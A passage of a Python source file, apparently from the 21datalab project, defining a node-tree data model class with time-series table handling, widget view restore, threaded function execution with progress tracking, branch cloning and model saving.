result[r]={"references":self.model[referencerId]["forwardRefs"]}
#special handling for showhide dynamic menu
showHide = widget.get_child("showHide")
if showHide:
for child in showHide.get_children():
result["showHide."+child.get_name()]={"value":child.get_value()}
return result
def set_widget_view(self,desc,viewInfo):
"""
write a set of info to a widget for restoring a view
"""
if viewInfo["version"]!= 1:
return False
valueNotifyIds=[]
refNotifyIds=[]
with self.lock:
id = self.__get_id(desc)
if not id: return False
widget = self.get_node(id)
if widget.get_type()!="widget":
return False
self.disable_observers()
try:
for k,v in viewInfo["nodes"].items():
if k.startswith("showHide"):
target = widget.get_child(k)
if target:
target.set_value(v["value"])
else:
if "value" in v:
child = widget.get_child(k)
child.set_value(v["value"])
valueNotifyIds.append(child.get_id())
if "references" in v:
child = widget.get_child(k)
self.remove_forward_refs(child.get_id())
self.add_forward_refs(child.get_id(),v["references"])
refNotifyIds.append(child.get_id())
except:
pass
self.enable_observers()
self.notify_observers(valueNotifyIds,["value"])
self.notify_observers(refNotifyIds,["forwardRefs"])
return True
def get_annotations_fast(self,desc):
"""
this is a helper function for the ui for the fast retrieval of annotations
Args: desc: the root[referencer] descriptor for the annotations
Returns:
a dict with {id:{"name":...,"id":{...}} with the annotations
"""
with self.lock:
id = self.__get_id(desc)
if not id: return {}
onlyid = self.get_leaves(desc, includeNodeInfo=False,allowDuplicates=True) #allow duplicates makes it faster, we get rid of duplicates later
result = {}
for small in onlyid:
id = small["id"]
if self.model[id]["type"] != "annotation":
continue
big = {"id": id}
big["browsePath"] = self.get_browse_path(id)
big["name"] = self.model[id]["name"]
# now look at the children
for childId in small["children"]:
name = self.model[childId]["name"]
type = self.model[childId]["type"]
if type== "referencer":
if len(self.model[childId]["forwardRefs"]):
big[name]=self.get_browse_path(self.model[childId]["forwardRefs"][0])
else:
big[name] = None
else:
big[name] = self.model[childId]["value"]
result[id] = big
return result
def __get_referencer_parents(self,ids):
backRefs = []
#we look back from this node
for id in ids:
if self.model[id]["type"] == "referencer":
#we take this one in
backRefs.append(id)
#plus we look further up
thisBackRefs = self.model[id]["backRefs"]
if thisBackRefs:
backRefs.extend(self.__get_referencer_parents(thisBackRefs))
return backRefs
def get_referencers_old(self,desc):
"""
find the referencers pointing to a node via the "leaves algorithm"
initially, we take the parent and the backref referencers
Args:
deep: we support the reverse leave-algorithms including any depth of children level after the last referencer,
e.g. a leaves-path of referencer -> referencer -> nodes -> child ->child is a valid match
"""
with self.lock:
id = self.__get_id(desc)
if not id:return None
ids = [self.model[id]["parent"],id]
if "0" in ids:
ids.remove("0")
referencers = self.__get_referencer_parents(ids)
return referencers
def get_referencers(self,desc,deepLevel = 1):
"""
find the referencers pointing to a node via the "leaves algorithm"
initially, we take the parent and the backref referencers
Args:
deepLevel: we support the reverse leave-algorithms including any depth of children level after the last referencer,
e.g. a leaves-path of referencer -> referencer -> nodes -> child ->child is a valid match
we give the number of parent levels to include in the search at the leaves
default is 1, so the node itself and its parent
"""
with self.lock:
id = self.__get_id(desc)
if not id:return None
if not deepLevel:
ids = [self.model[id]["parent"],id]
else:
ids = self._get_parents(id,deepLevel)
if "0" in ids:
ids.remove("0")
referencers = self.__get_referencer_parents(ids)
return referencers
def _get_parents(self,id,deepLevel = -1):
ids = []
while id != "1" and deepLevel >= 0:
ids.append(id)
deepLevel -=1
id = self.model[id]["parent"]
return ids
#get a table with values like in the table stored, start and end times are optional
# if start, end not given, then we get the full table with no postprocessing at all
def get_timeseries_table_old(self,variables,startTime=None,endTime=None,noBins=None,agg="sample",includeTimeStamps=None,includeBackGround=None):
with self.lock:
variables = self.get_id(variables)
return self.timeSeriesTables.get_value_table(variables, startTime=startTime, endTime=endTime, noBins=noBins,
agg=agg,
includeTimeStamps=includeTimeStamps) # ,startTime,endTime)
'''
if startTime == None and endTime ==None:
#request the full table
variables = self.get_id(variables) # convert all to ids
return self.timeSeriesTables.get_value_table(variables,startTime=startTime,endTime=endTime,noBins=noBins,agg=agg,includeTimeStamps=includeTimeStamps)#,startTime,endTime)
else:
# this is a more details request, we will try to deliver the data in bins and with
# aggretation postprocessing
variables = self.get_id(variables) # convert all to ids, not browsepath
return self.timeSeriesTables.get_value_table(variables,startTime,endTime,noBins,agg,includeTimeStamps=includeTimeStamps)
'''
#used in the Node class, give a column variable or the table itself, return the nodeid of the time variable of that table
def find_table_time_node(self,desc):
with self.lock:
table = self.__find_table(self.get_id(desc))
if not table:
return None
pathToTimeIndex = self.get_browse_path(table)+".timeField"
timeColumnId = self.get_leaves(pathToTimeIndex)[0]['id'] # this referencer must point to only one node
return timeColumnId
def find_table_node(self,desc):
"""
get the node id of a table giving a column node of the table as input
Args
desc[string]: a node descriptor of a column node belonging to the table
Returns:
the node id of the table node
"""
with self.lock:
return self.__find_table(desc)
def get_child(self,desc,childName):
"""
get a child based on the name given
Args:
desc: node descriptor of the node under which we look for children
childName: the child name to look for
Returns:
a node id if we find the child named childName under desc, or None if not found
"""
with self.lock:
nodeInfo = self.get_node_info(desc)
if nodeInfo:
for childId in nodeInfo['children']:
childInfo = self.get_node_info(childId)
if childInfo["name"] == childName:
return childId
return None
def get_children_dict(self,desc):
"""
create a dictionary with key= childName and value = nodedict
Args:
desc: the nodedescriptor
Returns:
a dict
"""
with self.lock:
childrenDic={}
id = self.get_id(desc)
if not id:
return None
for childId in self.model[id]["children"]:
child = self.get_node_info(childId)
childrenDic[child["name"]]=child
return childrenDic
def get_table_len(self,desc):
"""
get the current length of a table
Args:
desc: the node descriptor of type table
Returns:
the current length of the columns of the table, none if error
"""
with self.lock:
tableId = self.get_id(desc)
if not tableId: return None
if not self.model[tableId]["type"]=="table": return None
try:
columnid = self.get_child(tableId,"columns")
if not columnid: return None
columnIds = self.get_leaves_ids(columnid)
if columnIds:
return len(self.model[columnIds[0]]["value"])
except:
return None
def get_timeseries_table(self,variables,startTime=None,endTime=None,noBins=None,agg="sample",includeTimeStamps=None,format="array",includeBackGround=None):
"""
get a time series table from variables. The table is returned as a list of lists (format="array") or as a dict (any other format)
all variables requested must be of type "column" and must belong to the same table:
all columns requested here must have a direct backreference to the same node of type "columns"
todo: also allow "columns" to point to folders or multiple hierarchies of referencing/folders
Args:
variables (list(nodedescriptors)): nodes to be part of the data table requested (ordered!)
startTime, endTime: the start and end time of the table given as seconds since epoch
we also allow the special case of endTime = 0 and startTime = -interval (take an interval from the end)
we also allow the special case of startTime given and endTime = 0
noBins(int): the number of samples to be returned inside the table between start and end time,
if None is given, we return all samples (rows) we have in the table and do not aggregate
agg(string): the aggregation function to be used when we downsample the data,
"sample": we just pick out values (we sample) from the data set, this is actually not an aggregation
includeTimeStamps (bool): currently ignored
includeBackGround (bool): currently ignored
Returns(dict)
key : value
"__time" : list of timestamps for the returned table in epoch seconds
"variable1": the list of float values of one of the requested variables
"""
with self.lock:
#first check if all requested timeseries are columns from the same table
vars = self.get_id(variables)
table = []
for var in vars:
if self.model[var]["type"] != "column":
self.logger.warn("requested time series but not column type")
return False
table.append(self.__find_table(var))
if len(set(table)) != 1 or set(table)== {None}:
self.logger.warning("not the same table")
return False
#get the time field, and make fancy indexing via numpy arrays
pathToTimeIndex = self.get_browse_path(table[0])+".timeField"
timeColumnId = self.get_leaves(pathToTimeIndex)[0]['id']
if startTime and endTime:
times = numpy.asarray(self.model[timeColumnId]["value"])
indices = numpy.where((times>=startTime) & (times<=endTime))[0]
#xxx todo find the right index
elif startTime and not endTime:
#special cases for [-startTime:] and [startTime:] requests
if startTime < 0:
#this is the special case that we take an interval from the end
endTime = self.model[timeColumnId]["value"][-1]# the last
startTime = endTime + startTime # as startTime is negative this is actually a subtraction
else:
#starttime is positive
pass
times = numpy.asarray(self.model[timeColumnId]["value"])
indices = numpy.where(times >= startTime)[0]
else:
indices = numpy.arange(0,len(self.model[timeColumnId]["value"])) ## all indices
#now resample the indices to have the right bins number
if noBins:
varIndices = np.linspace(indices[0], indices[-1], noBins, endpoint=False, dtype=int)
else:
varIndices = indices
if format=="array":
result = []
for var in variables:
original = np.asarray(self.model[self.get_id(var)]["value"])[varIndices] # fancy indexing
data=original.tolist() # apply the selection with the indices list
result.append(data)
else:
result = {}
for var in variables:
original = np.asarray(self.model[self.get_id(var)]["value"])[varIndices] # fancy indexing
data = original.tolist() # apply the selection with the indices list
result[var]=data
result["__time"]=np.asarray(self.model[timeColumnId]["value"])[varIndices].tolist()
return result
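# usage sketch (illustrative only; `model`, the column paths and the epoch times are assumptions;
# all requested variables must be "column" nodes of the same table, see the docstring above):
#   data = model.get_timeseries_table(["root.mytable.var1", "root.mytable.var2"],
#                                     startTime=1577836800, endTime=1577923200,
#                                     noBins=300, format="dict")
#   # data["__time"] -> epoch seconds, data["root.mytable.var1"] -> list of floats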
def add_timeseries(self,blob,fast=False):
"""
add a dictionary of variables to a table, we check if the variables belong to the same table
also, times that come in as datetime object are converted to epoch seconds
Args:
blob (dict): a dictionary containing keys (node descriptors) and values (scalars)
Returns:
True/False for success
"""
with self.lock:
table = []
for key in blob:
id = self.get_id(key)
if not id:
self.logger.warn("add_timeseries count not find the variable:" + str(key))
return False
if self.model[id]["type"] != "column":
self.logger.warn("requested time series but not column type")
return False
table.append(self.__find_table(id))
if len(set(table)) != 1 or set(table) == {None}:
self.logger.warn("not the same table")
return False
#here, the request is parsed as ok, let's put the values
for key in blob:
id = self.get_id(key)
value = blob[key]
if type(self.model[id]["value"]) is not list:
self.model[id]["value"]=[]
#we auto-convert time stamps
if type(value) is datetime.datetime:
value = date2secs(value)
self.model[id]["value"].append(value)#finally put the value
#return the id of the table, given a column variable
def __find_table(self,desc):
"""
return the node id of the table, given a column variable
!! this has no lock, must be called under lock
Args:
desc(string): node descriptor of type column or the table itself
Returns:
the node id of the table to which the desc node belongs
"""
id = self.get_id(desc)
if not id: return False
if self.model[id]["type"] == "table":
return id
for ref in self.model[id]["backRefs"]:
if self.model[ref]["name"] == "columns":
return self.model[ref]["parent"]
return None
def ts_table_add_blob(self,dataBlob):
"""
this function add a data blob to an existing table, it accepts multiple values at once to speed up internals
Args:
dataBlob (dict or list(dict)): containing key:value pair with key=a descriptor of a column of one table
value: a scalar or list or numpy array of values
"""
if type(dataBlob) is list:
self.logger.error("currently no support for list blobs")
return None
with self.lock:
#first find the table and decide for the type conversion
tableId = None
for key in dataBlob:
if key != '__time':
tableId = self.__find_table(key)
break
if not tableId:
self.logger.error("can't find the table of "+str(list(dataBlob.keys())[0]))
return None
tableNode =self.get_node(tableId)
columnsType = numpy.float64 # this is the default
# make sure the time is there and convert it: we accept datetime objects, iso strings or floats seconds
# plus, the key will be the time node id afterwards
timeNode = tableNode.get_child("timeField").get_leaves()[0]
#try to find the time entry in the dataBlob, rename it to the timenode id
timeKeyOptions = ['__time',timeNode.get_browse_path(),timeNode.get_id()]
for timeKeyOption in timeKeyOptions:
if timeKeyOption in dataBlob:
dataBlob[timeNode.get_id()] = dataBlob.pop(timeKeyOption) # from now on the time field is keyed by the time node id
break
if timeNode.get_id() not in dataBlob:
self.logger.error("time field entry missing")
return False
#now check if all are on the same table and convert the keys to node ids
variables = list(dataBlob.keys())
for var in variables:
if self.__find_table(var) != tableId:
self.logger.error("variables are not on the same table")
return False
id = self.get_id(var)
if id != var:
dataBlob[self.get_id(var)]=dataBlob.pop(var) # make new entry as nodeid
#now check the sizes of the incoming data and convert them to the requested type
inputSizes = set()
for key,value in dataBlob.items():
if key == timeNode.get_id():
#if we handle the time node, we might have to convert
if type(value) is list or type(value) is numpy.ndarray:
newValues = []
#newValues = numpy.asarray([],dtype=numpy.float64)
for val in value:
newValues.append(date2secs(val))
dataBlob[key] = numpy.asarray(newValues,dtype=numpy.float64) # write it back to the data
else:
#it is a scalar
dataBlob[key] = numpy.asarray([date2secs(value)],dtype=numpy.float64)
else:
if numpy.isscalar(dataBlob[key]):
dataBlob[key]=numpy.asarray([dataBlob[key]],dtype=columnsType) # make a list if it is scalar
else:
dataBlob[key]=numpy.asarray(dataBlob[key],dtype=columnsType) # if it is a numpy array already, numpy makes no copy
inputSizes.add(dataBlob[key].shape[0])
if len(inputSizes)!=1:
self.logger.error("incoming data has different lengths, can't handle this as the padding would be unclear")
return False
# when we are here, we have converted all incoming data to numpy arrays, all belong to the same table
# and all have the same length, we are ready to put them inside
#print("through")
#now append them
return self.__ts_table_add_row(dataBlob,tableNodeId=tableId)
def __ts_table_add_row(self,dataBlob,tableNodeId=None,autoPad=True,pad=numpy.NaN):
"""
must be called under lock !!
this function accepts a dataBlob which is ready to be inserted, we don't make any more checks here
it must use variables from one table, it must contain data as numpyarrays
variables of the tables which are missing will be filled with pad if autoPad is true
"""
if not tableNodeId:
tableNode = self.get_node(self.__find_table(list(dataBlob.keys())[0]))
else:
tableNode = self.get_node(tableNodeId)
dataLen = dataBlob[list(dataBlob)[0]].shape[0]
columnNodes = tableNode.get_child("columns").get_leaves()
for columnNode in columnNodes:
id = columnNode.get_id()
if id in dataBlob:
#we add that one to the table
if type(self.model[id]['value']) != numpy.ndarray:
self.model[id]['value'] = dataBlob[id]
else:
self.model[id]['value'] = numpy.append(self.model[id]['value'],dataBlob[id])
else:
#we must pad
self.logger.debug("we are padding "+id+" with "+str(dataLen)+" values")
if type(self.model[id]['value']) != numpy.ndarray:
self.model[id]['value'] = numpy.full(dataLen,numpy.nan)
else:
self.model[id]['value'] = numpy.append(self.model[id]['value'],numpy.full(dataLen,numpy.nan))
return True
def append_table(self,blob,autocreate=True,autopad=True, timeSorted = False):
"""
this function accepts a dictionary containing paths and values and adds them as a row to a table
if autoPad is True: it is allowed to leave out columns, those will be padded with numpy.inf,
if autocreate is True: it is allowed to add unknown colums, those will be added automatically under the given name
Args:
blob(dict):
keys: node descriptors,
values: value to be appended to the table (scalar or list per variable is allowed
the times should be given in a variable ending with ".time"
if the table exists already and has another node for the time-values, then we take the .time values and put them on the timenode
autocreate(bool): if set to true and the nodes or table in the dict do not exist yet, we autocreate a table
autopad(bool) if set to true, we automatically pad values in an existing table if variables of the table are not part of the blob
doing so, we keep consistent lenght for all columns of a table
"""
#first check if we need to autocreate something, also check if we have multiple tables in play
with self.lock:
autocreates = []
tableId = None
columnsId = None
numberOfRows = None
for key in blob:
id = self.__get_id(key)
if not id:
if not autocreate:
self.logger.warn("appending table with unknown variables")
return None
else:
#we create this thing later
autocreates.append(key)
else:
#the id was found, let's find the right table
for ref in self.model[id]["backRefs"]:
if self.model[ref]["name"] == "columns":
#this is our table
if not tableId:
tableId = self.model[ref]["parent"]
columnsId = ref
numberOfRows = len(self.model[id]["value"])
else:
if tableId != self.model[ref]["parent"]:
self.logger.warn("mixed tables request")
return None
self.logger.debug("append table "+str(self.get_browse_path(tableId)))
if autocreates and autocreate:
#do we even have to create our table?
if not tableId:
#make a table structure based on the names given
tableName = autocreates[0].split('.')[1]+"_autotable"
tableId = self.create_node(parent="root",name=tableName,properties={"type":"table"})
columnsId = self.create_node(parent=tableId,name="columns",properties={"type":"referencer"})
timeId = self.create_node(parent=tableId, name="timeField", properties={"type": "referencer"})
numberOfRows=0
else:
#if we don't create the table, here is our timeId
timeReferencer = self.get_child(tableId, "timeField")
timeId = self.get_leaves_ids(timeReferencer)[0]
#we also then don't create any new time-field
autocreates = [path for path in autocreates if path[-5:]!=".time"]
self.logger.debug(f"table var autocreates: {autocreates}")
for path in autocreates:
id = self.create_node_from_path(path,properties={"type":"column"})
self.model[id]["value"]=numpy.full(numberOfRows,numpy.inf)
self.add_forward_refs(columnsId,[id])
if path.split('.')[-1]=="time":
#we just created the time field, we must also give the table struct the info
self.add_forward_refs(timeId,[id])
tableColumnIds = self.get_leaves_ids(columnsId) # a list of the ids of the columns
timeReferencer = self.get_child(tableId,"timeField")
timeId = self.get_leaves_ids(timeReferencer)[0]
timePath = None
for path in blob:
if path[-5:] == ".time":
timePath = path
if not timePath:
self.logger.error("no time path given")
return False
#now make arrays of all values
for k,v in blob.items():
if type(v) is list or type(v) is numpy.ndarray:
blob[k]=numpy.asarray(v,dtype=numpy.float64)
else:
blob[k] = numpy.asarray([v], dtype=numpy.float64)
valuesLen = len( blob[list(blob.keys())[0]] )
tableLen = len ( self.get_value(timeId))
if not timeSorted:
#just append
for path in blob:
if path.split('.')[-1]=="time":
id = timeId # we take the existing time Node of the table instead of just the variable named "time"
else:
id = self.get_id(path) # here
self.model[id]["value"] = numpy.append(self.model[id]["value"],blob[path]) #todo: this is a very inefficient copy and reallocate
if id in tableColumnIds:
tableColumnIds.remove(id)
#append this value
for id in tableColumnIds:
self.model[id]["value"] = numpy.append(self.model[id]["value"],numpy.full(valuesLen,numpy.inf,dtype=numpy.float64)) # pad the remainings with inf
#now trigger observser
self.__notify_observers(self.get_leaves_ids(columnsId),"value")
else:
#time sorted: find a place to insert the data in the times
currentTimes = numpy.asarray(self.get_value(timeId),dtype=numpy.float64)
startTime = blob[timePath][0]
endTime = blob[timePath][-1]
firstIndexGreaterStart, = numpy.where(currentTimes>startTime) #where returns tuple
if len(firstIndexGreaterStart) == 0:
firstIndexGreaterStart = tableLen
else:
firstIndexGreaterStart=firstIndexGreaterStart[0]
firstIndexGreaterEnd, = numpy.where(currentTimes > endTime)
if len(firstIndexGreaterEnd) == 0:
firstIndexGreaterEnd = tableLen
else:
firstIndexGreaterEnd=firstIndexGreaterEnd[0]
if firstIndexGreaterEnd != firstIndexGreaterStart:
self.logger.error("we can't insert the data in a row-wise time manner, only as block")
return False
startIndex = firstIndexGreaterStart # the position to insert the incoming data
self.logger.debug(f"insert data @{startIndex} of {tableLen}")
for path in blob:
if path.split('.')[-1]=="time":
id = timeId # we take the existing time Node of the table instead of just the variable named "time"
else:
id = self.get_id(path) # here
self.model[id]["value"] = numpy.insert(self.model[id]["value"],startIndex,blob[path]) #todo: this is a very inefficient copy and reallocate
if id in tableColumnIds:
tableColumnIds.remove(id)
#append this value
for id in tableColumnIds:
self.model[id]["value"] = numpy.insert(self.model[id]["value"],startIndex,numpy.full(valuesLen,numpy.inf,dtype=numpy.float64)) # pad the remainings with inf
#
pass
return True
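# usage sketch (illustrative only; `model` and the paths are assumptions;
# an entry ending in ".time" is required, see the docstring above):
#   model.append_table({
#       "root.mytable.time": [1577836800.0, 1577836801.0],
#       "root.mytable.var1": [1.0, 2.0],
#   })   # unknown columns are auto-created, missing columns of the table are padded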
def __show_subtree(self,rootId):
currentBrowsePath = self.get_browse_path(rootId)
indentation = "| "*(len(currentBrowsePath.split('.'))-1)
print (indentation+"-",self.model[rootId]["name"],end="")
noShowProperties=["name","parent","children"]
for property in self.model[rootId]:
try:
if property=="value" and len(self.model[rootId]["value"])>10:
print(",len:"+str(len(self.model[rootId]["value"])),end="")
except:
pass
if not property in noShowProperties:
try:
#if this entry has a len and the len is larger then 20, show only a part of it
if len(self.model[rootId][property]) > 10:
print("," + property + "=" + str(self.model[rootId][property][0:10])+"...("+str(len(self.model[rootId][property]))+")", end="")
else:
print("," + property + "=" + str(self.model[rootId][property]), end="")
except:
print("," + property + "=" + str(self.model[rootId][property]), end="")
if self.model[rootId]["type"]=="timeseries":
print(","+self.time_series_get_info(rootId), end="")
print("")
for child in self.model[rootId]["children"]:
self.__show_subtree(child)
def execute_object_function(self,desc,functionName,parameter=None):
with self.lock:
id = self.get_id(desc)
object = self.get_object(id)
if not object:
return False
try:
functionPointer = getattr(object,functionName)
self.executionQueue.put({"functionPointer":functionPointer,"parameter":parameter,"id":id})
return True
except:
self.logger.error(f"function {functionName} not sttr of object {desc} {object}")
return False
def execute_function(self,desc,parameter = None):
"""
create a thread to execute a function there,
if the function has autoReload, we re-import the external
file
Args:
desc: node descriptor of the node (type "function") to be executed
Returns:
True if the execution thread was launched
"""
with self.lock:
id = self.get_id(desc)
if self.model[id]["type"]!= "function":
return False
functionName = self.model[id]["functionPointer"]
if not functionName in self.functions:
self.logger.error(f"can't find function {functionName} in global list")
return False
functionNode = self.get_node(id)
executionType = functionNode.get_child("control").get_child("executionType").get_value()
if executionType in ["async","sync"]:
self.executionQueue.put(id)
self.logger.info(f"function {desc} queued for execution")
return True
elif executionType =="threaded":
self.logger.info(f"function {desc} started in thread")
thread = threading.Thread(target=self.__execution_thread, args=[id])
thread.start()
return True
else:
self.logger.error(f"function {desc} cant be started, unknown execution type {executionType}")
return False
#check if function is interactive, then we reload it right now
if self.model[id]["autoReload"] == True and self.global_auto_reload_enabled():
#if self.functions[functionName]["isInteractive"]:
# must reload the module
module = importlib.reload(self.functions[functionName]["module"])
functionPointer = getattr(module,functionName.split('.',1).pop())
#now update our global list
self.functions[functionName]["module"] = module
self.functions[functionName]["function"] = functionPointer
#here, the lock is open again!
try:
if executionType == "async" or executionType == "threaded":
thread = threading.Thread(target=self.__execution_thread, args=[id])
thread.start()
return True
elif executionType == "sync":
self.__execution_thread(id) # call it sync here
return True
else:
self.logger.error("unsupported execution type"+str(executionType)+" in function"+str(id))
raise(Exception)
except:
return False
def start_function_execution_thread(self):
self.functionExecutionRunning = True
self.functionExecutionThread = threading.Thread(target=self._function_execution_thread)
self.functionExecutionThread.start()
def _function_execution_thread(self):
while self.functionExecutionRunning:
try:
nextId = self.executionQueue.get(timeout=1)
self.logger.info(f"now executing function {str_lim(nextId,300)}")
self.__execution_thread(nextId)
except:
pass
def delete(self):
self.functionExecutionRunning = False
def exit(self):
self.delete()
def close(self):
self.delete()
def __dispatch(self,function,timeout,param):
thread = threading.Thread(target=self.__dispatch_thread_function, args=[function,timeout,param])
thread.start()
def __dispatch_thread_function(self,function,timeout,param):
time.sleep(timeout)
function(param)
#exit thread
def reset_progress_bar(self,controlNode):
controlNode.get_child("progress").set_value(0)
def __clone_children(self,source,dest):
""" see def clone() for more info """
sourcePath = self.get_browse_path(source)
destPath = self.get_browse_path(dest)
for childName,childInfo in self.get_children_dict(source).items():
childId = childInfo["id"]
if childInfo["type"] in ["timeseries","file","column","object"]:
self.logger.debug(f"clone skip node {childInfo['name']}")
continue
newProps = {k:v for k,v in childInfo.items() if k not in ["parent","children","backRefs","forwardRefs","browsePath","id","name"]}
cloneId = self.create_node_from_path(destPath+"."+childInfo["name"],properties=newProps)
grandChildren = self.get_children_dict(childId)
if grandChildren != {}:
self.__clone_children(childId,cloneId)
def __clone_referencer_targets(self,source,dest):
""" see def clone() for more info """
sourcePath = self.get_browse_path(source)
destPath = self.get_browse_path(dest)
childIds = self.get_node_info(sourcePath)["children"]
while childIds:
id = childIds.pop()
info = self.get_node_info(id)
if info["type"]=="referencer":
newreferencer = self.get_browse_path(id).replace(sourcePath, destPath)
#now check: if the referencers points to something inside, we do the same but in the target root, else we take it as it is
for targetId in info["forwardRefs"]:
targetPath = self.get_browse_path(targetId)
newTargetPath = targetPath.replace(sourcePath,destPath)# if not found, we get it unchanged
self.add_forward_refs(newreferencer,[newTargetPath])
childIds.extend(info["children"])
def clone(self,desc):
"""
clone a node and all its subnodes (a whole branch)
we will create all nodes which existed in the source branch, for the referencers we use this strategy:
references pointing to a node under the source branch will be translated to references in the target branch
pointing to the corresponding new node in the target branch
references pointing to outside the source branch will also be created in the cloned branch pointing to
the same target
Args:
desc: the source node descriptor
"""
sourcePath = self.get_browse_path(desc)
if not sourcePath:
return False
targetPath = sourcePath+"_"+getRandomId()
sourceInfo = self.get_node_info(desc)
transferRoot = self.create_node_from_path(targetPath,properties={"type":sourceInfo["type"]})
#now iterate over the nodes and children and create the same nodes
self.__clone_children(desc,transferRoot)
self.__clone_referencer_targets(sourcePath,transferRoot)
return True
def execute_synchronous(self,id):
"""
execute a function synchronously here (this can be useful when executing a function within another
"""
return self.__execution_thread(id)
def __execution_thread(self,id):
"""
the thread function to execute functions
it currently uses the global lock so it will lock out any other work on the model during execution
all inputs and outputs are found in the model
we also set the status and result from here, not needed to do that in the function
Args:
id: the node id of the function to be executed or the dict for an object call
"""
try:
if type(id) is str:
if self.model[id]["type"] == "function":
isFunction = True
else:
isFunction = False
with self.lock:
if isFunction:
if self.model[id]["autoReload"] == True and self.global_auto_reload_enabled():
# must reload the module
functionName = self.model[id]["functionPointer"]
module = importlib.reload(self.functions[functionName]["module"])
functionPointer = getattr(module, functionName.split('.', 1).pop())
# now update our global list
self.functions[functionName]["module"] = module
self.functions[functionName]["function"] = functionPointer
#self.logger.info(f"in execution Thread {threading.get_ident()}, executing {id} {functionName}")
#check the function
functionName = self.model[id]["functionPointer"]
functionPointer = self.functions[functionName]['function']
self.logger.info(f"in execution Thread {threading.get_ident()}, executing {id} {functionName}")
else:
functionPointer = id["functionPointer"]
functionName = functionPointer.__name__
parameter = id["parameter"]
id = id["id"] #for deeper down
#now set some controls
try:
node = self.get_node(id)
controlNode = node.get_child("control")
targetId = self.get_id("root.system.progress.targets")
if targetId:
if not self.get_node_info(targetId)["forwardRefs"]:
#we only hook us on the observer if free
self.disable_observers()
self.remove_forward_refs(targetId)
self.add_forward_refs(targetId,[controlNode.get_child("progress").get_id()])
self.enable_observers()
# we don't signal these things
self.disable_observers()
controlNode.get_child("status").set_value("running")
controlNode.get_child("result")#.set_value("pending")
if controlNode.get_child("progress").get_value()!=0:
#we set the control progress only if necessary, otherwise we can get interleaved event yields:
# the event queue always sends the first event of a kind, then flushes the queue and sends the same of a kind after a timeout
# so having this progress = 0 event too often is not a good idea: we could get an interleaved "0" during a 0.1 0.2 from a plug in
controlNode.get_child("progress").set_value(0) #progress will always be observed even in disable observers
#controlNode.get_child("signal").set_value("nosignal")
startTime = datetime.datetime.now()
controlNode.get_child("lastStartTime").set_value(startTime.isoformat())
self.enable_observers()
except:
self.logger.error("error during execution preparation, this can be critical, maybe disabled observers")
self.log_error()
pass
# model lock open: we execute without model lock
if isFunction:
result = functionPointer(node) # this is the actual execution
else:
result = functionPointer(parameter)
#now we are back, set the status to finished
duration = (datetime.datetime.now()-startTime).total_seconds()
with self.lock:
# this is a bit dangerous, maybe the node is not there anymore, so the
# inner function calls of node.xx() may return nothing; we guard with try/except
try:
self.logger.debug(f"function {functionName} execution completed in {duration} ")
self.disable_observers() # we don't signal these
controlNode.get_child("lastExecutionDuration").set_value(duration)
controlNode.get_child("status").set_value("finished")
self.enable_observers()
controlExecutionCounter = controlNode.get_child("executionCounter")
controlExecutionCounter.set_value(controlExecutionCounter.get_value() + 1)
controlProgress = controlNode.get_child("progress")
if controlProgress.get_value()!=0:
#reset the progress back to zero
#only set it if it was set by the function, otherwise we save a progress event
controlProgress.set_value(0)
#now unhook the observer of our progress
targetId = self.get_id("root.system.progress.targets")
if targetId:
#we have a system observer for progress
forwards = self.get_node_info(targetId)["forwardRefs"]
if forwards and forwards[0] == controlNode.get_child("progress").get_id():
#the observer is watching us, remove it
self.logger.debug("remove "+self.get_browse_path(controlNode.get_child("progress").get_id()))
self.remove_forward_refs(targetId)
#self.notify_observers([controlExecutionCounter.get_id(),controlProgress.get_id()],"value")
if not isFunction:
result = True # for execution of member function we don't have a general return code
if result == True:
controlNode.get_child("result").set_value("ok")
self.publish_status_msg("result of " + str(functionName) + ": " + controlNode.get_child("result").get_value())
else:
if controlNode.get_child("result").get_value() == "pending":
#if the functions hasn't set anything else
controlNode.get_child("result").set_value("error")
#also publish this result
self.publish_status_msg("error in " + str(functionName) + ": " + controlNode.get_child("result").get_value())
self.publish_event("system.function.complete",id,{"result":controlNode.get_child("result").get_value(),"progress":controlNode.get_child("progress").get_value()})
# except:
# self.logger.error("problem setting results from execution of #"+str(id))
except Exception as ex:
errorString = str(sys.exc_info()[1])
self.logger.error("error inside execution thread, id" +str(id)+" functionname"+str(functionName)+errorString+" "+str(ex)+" "+str(traceback.format_exc()))
#unhook the progress bar
targetId = self.get_id("root.system.progress.targets")
if targetId:
#we have a system observer for progress
forwards = self.get_node_info(targetId)["forwardRefs"]
if forwards and forwards[0] == controlNode.get_child("progress").get_id():
#the observer is watching us, remove it
self.logger.debug("remove "+self.get_browse_path(controlNode.get_child("progress").get_id()))
self.remove_forward_refs(targetId)
pass
except Exception as ex:
errorString = str(sys.exc_info()[1])
self.logger.error("error inside execution thread level outer, id " +str(id)+" functionname"+str(functionName)+errorString+" "+str(ex)+" "+str(traceback.format_exc()))
controlNode.get_child("status").set_value("interrupted")
controlNode.get_child("result").set_value("error:"+errorString)
controlNode.get_child("progress").set_value(0)
self.publish_status_msg("error in "+str(functionName)+": "+errorString)
#unhook the progress bar
targetId = self.get_id("root.system.progress.targets")
if targetId:
#we have a system observer for progress
forwards = self.get_node_info(targetId)["forwardRefs"]
if forwards and forwards[0] == controlNode.get_child("progress").get_id():
#the observer is watching us, remove it
self.logger.debug("remove "+self.get_browse_path(controlNode.get_child("progress").get_id()))
self.remove_forward_refs(targetId)
return
def get_error(self):
s=f"{sys.exc_info()[1]}, {traceback.format_exc()}"
return s
def log_error(self):
self.logger.error(self.get_error())
def show(self):
"""
show the current model as an ASCII tree on the console
"""
with self.lock:
self.__show_subtree("1")
def save_model(self):
return self.save(self.currentModelName,includeData=False)
# save model and data to files
def save(self, fileName, includeData = True):
"""
save the model to disk, save the tables separately
the model file will be saved as ./models/fileName.model.json and the tables will be saved under
./models/fileName.tablePath.npy
Args:
fileName: the name to store it under, please don't give extensions
includeData : if set to False, we DON'T store the values of nodes of type table or file to disk
"""
self.logger.debug(f"save model as {fileName} with data {includeData}")
self.publish_status_msg(f"saving model {fileName}...")
with self.lock:
try:
m = self.get_model_for_web() # leave out the tables
model_directory = None
model_filename = None
if os.path.isabs(fileName):
model_directory = os.path.dirname(fileName)
model_filename = os.path.basename(fileName)
else:
file_directory = os.path.dirname(fileName)
if len(file_directory) == 0:
# we are only given a filename, use 21datalab subfolder models as directory
model_directory = os.path.join(os.path.dirname(__file__), "models")
model_filename = fileName
else:
# we are given a relative path + filename
model_directory = os.path.dirname(fileName)
model_filename = os.path.basename(fileName)
if includeData:
self.ts.save(os.path.join(model_directory, model_filename))
